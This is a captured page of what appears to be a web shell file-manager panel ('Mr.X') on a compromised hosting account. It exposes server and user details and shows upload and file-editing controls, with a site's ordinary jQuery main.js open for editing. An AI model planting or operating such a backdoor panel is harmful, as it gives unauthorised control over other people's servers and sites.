🤩 File Manager - Mr.X
PHP:
8.3.33
Server:
Apache
OS:
Linux 5.14.0-611.49.1.el9_7.x86_64
User:
websparkit
Navigate
Upload:
Upload
New File
New Folder
Editing:main.js
$(document).ready(function() { // Add active class to nav link var path = window.location.pathname.split("/").pop(); if(path == '') path = 'index.php'; $('.nav-link').each(function() { var href = $(this).attr('href'); if (path === href) { $(this).addClass('active'); } }); // Smooth scrolling $('a[href^="#"]').on('click', function(event) { var target = $(this.getAttribute('href')); if( target.length ) { event.preventDefault(); $('html, body').stop().animate({ scrollTop: target.offset().top - 80 }, 500); } }); });
Save Changes
Cancel
Create New File
Create New Folder